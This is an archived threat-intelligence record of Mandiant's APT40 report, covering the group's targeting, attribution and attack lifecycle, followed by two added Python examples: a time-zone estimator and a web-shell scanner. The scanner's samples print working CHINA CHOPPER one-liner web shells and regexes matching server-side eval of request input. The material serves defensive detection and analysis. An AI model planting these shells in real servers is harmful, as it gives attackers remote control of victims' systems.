{
	"id": "7c43625e-1123-422d-9688-06fa846e2ee6",
	"created_at": "2026-04-06T00:10:05.093984Z",
	"updated_at": "2026-04-10T13:11:38.743458Z",
	"deleted_at": null,
	"sha1_hash": "dfff56f62bd7c79fa154711302746dae9d5ca7d8",
	"title": "APT40 | Examining a China-Nexus Espionage Actor | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1132422,
	"plain_text": "APT40 | Examining a China-Nexus Espionage Actor | Mandiant\r\nBy Mandiant\r\nPublished: 2019-03-04 · Archived: 2026-04-05 15:12:36 UTC\r\nWritten by: Fred Plan, Nalani Fraser, Jacqueline O'Leary, Vincent Cannon, Ben Read\r\nFireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence\r\ntargets from a China-nexus state sponsored actor we call APT40. The actor has conducted operations since at least\r\n2013 in support of China’s naval modernization effort. The group has specifically targeted engineering,\r\ntransportation, and the defense industry, especially where these sectors overlap with maritime technologies. More\r\nrecently, we have also observed specific targeting of countries strategically important to the Belt and Road\r\nInitiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia,\r\nSwitzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously\r\nreported as TEMP.Periscope and TEMP.Jumper.\r\nMission\r\nIn December 2016, China’s People Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater\r\nvehicle (UUV) operating in the South China Sea. The incident paralleled China’s actions in cyberspace; within a\r\nyear APT40 was observed masquerading as a UUV manufacturer, and targeting universities engaged in naval\r\nresearch. That incident was one of many carried out to acquire advanced technology to support the development of\r\nChinese naval capabilities. We believe APT40’s emphasis on maritime issues and naval technology ultimately\r\nsupport China’s ambition to establish a blue-water navy.\r\nIn addition to its maritime focus, APT40 engages in broader regional targeting against traditional intelligence\r\ntargets, especially organizations with operations in Southeast Asia or involved in South China Sea disputes. 
Most\r\nrecently, this has included victims with connections to elections in Southeast Asia, which is likely driven by events\r\naffecting China’s Belt and Road Initiative. China’s “One Belt, One Road” (一带一路) or “Belt and Road\r\nInitiative” (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the\r\nMiddle East, and Africa to develop a trade network that will project China’s influence across the greater region.\r\nhttps://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html\r\nPage 1 of 5\n\nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway,\r\nGermany, Saudi Arabia, Cambodia and Indonesia\r\nAttribution\r\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The\r\nactor’s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the\r\nactor is based in China. Analysis of the operational times of the group’s activities indicates that it is probably\r\ncentered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains\r\nwere initially registered by China-based domain resellers and had Whois records with Chinese location\r\ninformation, suggesting a China-based infrastructure procurement process.\r\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one\r\ninstance, a log file recovered from an open indexed server revealed that an IP address (112.66.188.28) located in\r\nHainan, China, had been used to administer the command and control node that was communicating with malware\r\non victim machines. 
All of the logins to this C2 were from computers configured with Chinese language settings.\r\nAttack Lifecycle\r\nInitial Compromise\r\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server\r\nexploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web\r\ncompromises.\r\nAPT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a\r\nweb shell can provide continued access to victims' environments, re-infect victim systems, and facilitate\r\nlateral movement.\r\nThe operation’s spear-phishing emails typically leverage malicious attachments, although Google Drive\r\nlinks have also been observed.\r\nAPT40 leverages exploits in its phishing operations, often weaponizing vulnerabilities within days of\r\ntheir disclosure. Observed vulnerabilities include:\r\nCVE-2012-0158\r\nCVE-2017-0199\r\nCVE-2017-8759\r\nCVE-2017-11882\r\nFigure 2: APT40 attack lifecycle\r\nEstablish Foothold\r\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or\r\nused by other threat groups. In some cases, the group has used executables with code signing certificates to avoid\r\ndetection.\r\nFirst-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other\r\npayloads.\r\nPHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by\r\nAPT40.\r\nAPT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted\r\nenvironment. 
Valid credentials are ideal for the group because, once obtained, they reduce its\r\nneed to rely on malware to continue the mission.\r\nEscalate Privileges\r\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump\r\npassword hashes.\r\nAPT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used\r\nalongside the AIRBREAK and BADFLICK backdoors.\r\nAdditionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are\r\nbelieved to be used during intrusions.\r\nInternal Reconnaissance\r\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The\r\ngroup also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows\r\ncapabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\r\nAPT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct\r\nnetwork enumeration.\r\nAPT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of\r\na victim’s environment.\r\nWeb shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often\r\nnot configured with the same security controls as public-facing counterparts, making them more vulnerable\r\nto exploitation by APT40 and similarly sophisticated groups.\r\nLateral Movement\r\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web\r\nshells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). 
For each new system compromised, the\r\ngroup usually executes malware, performs additional reconnaissance, and steals data.\r\nAPT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network\r\nresources management tool) for lateral movement.\r\nPublicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\r\nAlthough MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral\r\nmovement.\r\nAPT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack\r\ndifferent protocols and services.\r\nMaintain Presence\r\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These\r\ntools enable continued control of key systems in the targeted network.\r\nAPT40 strongly favors web shells for maintaining presence, especially publicly available tools.\r\nTools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase;\r\nthis includes AIRBREAK and PHOTO.\r\nSome APT40 malware tools can evade typical network detection by leveraging legitimate websites, such\r\nas GitHub, Google, and Pastebin for initial C2 communications.\r\nCommon TCP ports 80 and 443 are used to blend in with routine network traffic.\r\nComplete Mission\r\nCompleting missions typically involves gathering and transferring information out of the target network, which\r\nmay involve moving files through multiple systems before reaching the destination. APT40 has been observed\r\nconsolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the\r\ndata before exfiltration. 
We have also observed APT40 develop tools such as PAPERPUSH to make its data targeting and theft more\r\neffective.\r\nOutlook and Implications\r\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular\r\ntempo, and we anticipate their operations will continue through at least the near and medium term. Based on\r\nAPT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s\r\nfuture targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road\r\nInitiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued APT40 activity\r\nextending to the project’s regional opponents.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MISPGALAXY",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html"
	],
	"report_names": [
		"apt40-examining-a-china-nexus-espionage-actor.html"
	],
	"threat_actors": [
		{
			"id": "16f2436b-5f84-44e3-a306-f1f9e92f7bea",
			"created_at": "2023-01-06T13:46:38.745572Z",
			"updated_at": "2026-04-10T02:00:03.086207Z",
			"deleted_at": null,
			"main_name": "APT40",
			"aliases": [
				"ATK29",
				"Red Ladon",
				"MUDCARP",
				"ISLANDDREAMS",
				"TEMP.Periscope",
				"KRYPTONITE PANDA",
				"G0065",
				"TA423",
				"ITG09",
				"Gingham Typhoon",
				"TEMP.Jumper",
				"BRONZE MOHAWK",
				"GADOLINIUM"
			],
			"source_name": "MISPGALAXY:APT40",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "83025f5e-302e-46b0-baf6-650a4d313dfc",
			"created_at": "2024-05-01T02:03:07.971863Z",
			"updated_at": "2026-04-10T02:00:03.743131Z",
			"deleted_at": null,
			"main_name": "BRONZE MOHAWK",
			"aliases": [
				"APT40 ",
				"GADOLINIUM ",
				"Gingham Typhoon ",
				"Kryptonite Panda ",
				"Leviathan ",
				"Nanhaishu ",
				"Pickleworm ",
				"Red Ladon ",
				"TA423 ",
				"Temp.Jumper ",
				"Temp.Periscope "
			],
			"source_name": "Secureworks:BRONZE MOHAWK",
			"tools": [
				"AIRBREAK",
				"BlackCoffee",
				"China Chopper",
				"Cobalt Strike",
				"DadJoke",
				"Donut",
				"FUSIONBLAZE",
				"GreenCrash",
				"Meterpreter",
				"Nanhaishu",
				"Orz",
				"SeDll"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "59be3740-c8c7-47aa-84c8-e80d0cb7ea3a",
			"created_at": "2022-10-25T15:50:23.481057Z",
			"updated_at": "2026-04-10T02:00:05.306469Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"MUDCARP",
				"Kryptonite Panda",
				"Gadolinium",
				"BRONZE MOHAWK",
				"TEMP.Jumper",
				"APT40",
				"TEMP.Periscope",
				"Gingham Typhoon"
			],
			"source_name": "MITRE:Leviathan",
			"tools": [
				"Windows Credential Editor",
				"BITSAdmin",
				"HOMEFRY",
				"Derusbi",
				"at",
				"BLACKCOFFEE",
				"BADFLICK",
				"gh0st RAT",
				"PowerSploit",
				"MURKYTOP",
				"NanHaiShu",
				"Orz",
				"Cobalt Strike",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b9806584-4d82-4f32-ae97-18a2583e8d11",
			"created_at": "2022-10-25T16:07:23.787833Z",
			"updated_at": "2026-04-10T02:00:04.749709Z",
			"deleted_at": null,
			"main_name": "Leviathan",
			"aliases": [
				"APT 40",
				"ATK 29",
				"Bronze Mohawk",
				"G0065",
				"Gadolinium",
				"Gingham Typhoon",
				"ISLANDDREAMS",
				"ITG09",
				"Jumper Taurus",
				"Kryptonite Panda",
				"Mudcarp",
				"Red Ladon",
				"TA423",
				"TEMP.Jumper",
				"TEMP.Periscope"
			],
			"source_name": "ETDA:Leviathan",
			"tools": [
				"AIRBREAK",
				"Agent.dhwf",
				"Agentemis",
				"AngryRebel",
				"BADFLICK",
				"BlackCoffee",
				"CHINACHOPPER",
				"China Chopper",
				"Cobalt Strike",
				"CobaltStrike",
				"DADJOKE",
				"Dadstache",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"GRILLMARK",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEFRY",
				"Hellsing Backdoor",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"LUNCHMONEY",
				"Living off the Land",
				"MURKYTOP",
				"Moudour",
				"Mydoor",
				"NanHaiShu",
				"Orz",
				"PCRat",
				"PNGRAT",
				"PlugX",
				"RedDelta",
				"SeDLL",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"cobeacon",
				"gresim",
				"scanbox"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434205,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.pdf",
		"text": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.txt",
		"img": "https://archive.orkl.eu/dfff56f62bd7c79fa154711302746dae9d5ca7d8.jpg"
	}
}
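The Attribution section of the archived report says APT40's operational times are "probably centered around China Standard Time (UTC +8)". The example below, added here and not code from Mandiant or the report, shows how such an estimate is made from activity timestamps: each candidate UTC offset is scored by how many events fall in an assumed weekday working window once the timestamps are shifted into that offset, and the best-scoring offset is the fit. The timestamps, the 09:00 to 18:00 window and the function names are this example's assumptions; the timestamps are constructed, not report data.

```python
"""Estimate an actor's working time zone from UTC activity timestamps.

Added example, not code from the Mandiant/FireEye report. For each candidate
UTC offset, shift every timestamp into that local time and count how many
events land in an assumed working window (Mon-Fri, 09:00-17:59). The offset
with the highest count is the best fit. The timestamps are CONSTRUCTED for
this example and are not data from the report.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed sample: UTC times of C2 logins. They cluster in 01:00-10:00 UTC,
# i.e. 09:00-18:00 at UTC+8; two outliers (a Saturday, a late night) included.
SAMPLE_EVENTS_UTC = [
    "2018-03-05T01:12:00Z", "2018-03-05T02:40:00Z", "2018-03-05T06:05:00Z",
    "2018-03-06T01:55:00Z", "2018-03-06T04:20:00Z", "2018-03-06T09:30:00Z",
    "2018-03-07T01:10:00Z", "2018-03-07T03:15:00Z", "2018-03-07T07:45:00Z",
    "2018-03-08T02:05:00Z", "2018-03-08T05:50:00Z", "2018-03-08T08:10:00Z",
    "2018-03-09T01:30:00Z", "2018-03-09T03:00:00Z",
    "2018-03-10T02:00:00Z",  # Saturday at UTC+8: outside the work window
    "2018-03-12T17:30:00Z",  # 01:30 next day at UTC+8: outside the window
]

WORK_START, WORK_END = 9, 18  # assumed local working hours, [start, end)


def parse_utc(stamp: str) -> datetime:
    """Parse an ISO-8601 'Z' timestamp into an aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def in_work_window(local: datetime) -> bool:
    """True if the local time is a weekday inside the working window."""
    return local.weekday() < 5 and WORK_START <= local.hour < WORK_END


def score_offsets(stamps, offsets=range(-12, 15)) -> dict:
    """Map each candidate UTC offset (hours) to the number of in-window events."""
    events = [parse_utc(s) for s in stamps]
    scores = {}
    for off in offsets:
        tz = timezone(timedelta(hours=off))
        scores[off] = sum(in_work_window(e.astimezone(tz)) for e in events)
    return scores


def best_offsets(stamps) -> list:
    """All offsets that achieve the top score (more than one entry means a tie)."""
    scores = score_offsets(stamps)
    top = max(scores.values())
    return sorted(off for off, s in scores.items() if s == top)


def hour_histogram(stamps, offset: int) -> Counter:
    """Local-hour histogram at a given offset, for eyeballing the work pattern."""
    tz = timezone(timedelta(hours=offset))
    return Counter(parse_utc(s).astimezone(tz).hour for s in stamps)


if __name__ == "__main__":
    scores = score_offsets(SAMPLE_EVENTS_UTC)
    for off in sorted(scores, key=scores.get, reverse=True)[:5]:
        print(f"UTC{off:+d}: {scores[off]}/{len(SAMPLE_EVENTS_UTC)} events in work hours")
    print("best fit:", best_offsets(SAMPLE_EVENTS_UTC))
    print("local-hour histogram at UTC+8:",
          sorted(hour_histogram(SAMPLE_EVENTS_UTC, 8).items()))
```

On the constructed sample UTC+8 wins with 14 of 16 events in the window and UTC+9 is one behind, which is the typical shape: neighbouring offsets score almost as well, so the result is a band, not a pin. That is why the report pairs timing with other artifacts (registrar records, Chinese language settings on the C2 logins, the Hainan administration IP); a shift-working operator or a deliberately skewed schedule would defeat timing analysis on its own.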
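The Initial Compromise and Maintain Presence sections of the archived report stress APT40's reliance on publicly available web shells, with CHINA CHOPPER among the most frequently observed. The example below, added here and not code from Mandiant or the report, scans web content for the one-liner shell form that CHINA CHOPPER and similar tools use: a server-side `eval` or command execution applied directly to request input. The three malicious samples are the widely published CHINA CHOPPER one-liners; the two benign pages, the pattern names and `scan_tree()` are this example's assumptions.

```python
"""Find one-liner web shells (CHINA CHOPPER and similar) in web content.

Added example, not code from the Mandiant/FireEye report. The detection is a
set of regexes for "evaluate request-controlled input", which is the whole
server side of a one-liner shell. The samples dict is CONSTRUCTED so the
scan runs offline; scan_tree() applies the same check to a real web root.
"""
import os
import re

# Server-side evaluation of request-controlled input: the shape of a one-liner shell.
SHELL_PATTERNS = {
    # PHP: <?php @eval($_POST['x']); ?>
    "php_eval_request": re.compile(
        r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    # PHP: system($_POST['x']) and friends
    "php_exec_request": re.compile(
        r"\b(system|passthru|shell_exec|exec)\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I),
    # ASPX/JScript: eval(Request.Item["x"], "unsafe")
    "aspx_jscript_eval": re.compile(
        r"\beval\s*\(\s*Request\s*(?:\.Item)?\s*\[[^\]]*\]\s*,\s*[\"']unsafe[\"']", re.I),
    # Classic ASP: eval request("x")
    "asp_eval_request": re.compile(r"\beval\s*\(?\s*request\s*\(", re.I),
}

# Constructed web root: three published CHINA CHOPPER one-liners, two benign pages.
SAMPLES = {
    "upload/img.php": "<?php @eval($_POST['chopper']);?>",
    "aspnet_client/ping.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "old/cmd.asp": '<%eval request("password")%>',
    "index.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
    "search.aspx": '<% Response.Write(Server.HtmlEncode(Request.QueryString["name"])); %>',
}


def scan_content(text: str) -> list:
    """Return the names of every shell pattern that matches the file content."""
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]


def scan_samples() -> dict:
    """Scan the constructed samples; returns only the paths that were flagged."""
    return {path: hits for path, text in SAMPLES.items() if (hits := scan_content(text))}


def scan_tree(root: str, exts=(".php", ".asp", ".aspx", ".jsp", ".jspx", ".ashx")) -> dict:
    """Walk a real web root and flag server-side scripts that match a pattern."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            hits = scan_content(text)
            if hits:
                findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan_samples().items():
        print(f"{path}: {', '.join(hits)}")
```

Pattern matching catches the unmodified one-liners and little else: a shell that base64-decodes or string-builds its `eval` call, or that lives in a renamed legitimate framework file, will not match. In practice this scan is a first pass; diffing the web root against a known-good deployment and watching for the web server worker process spawning shells (w3wp.exe starting cmd.exe, for instance) cover the cases the regexes miss, and the report's point that internal web servers are often less protected than public-facing ones means the scan should include them.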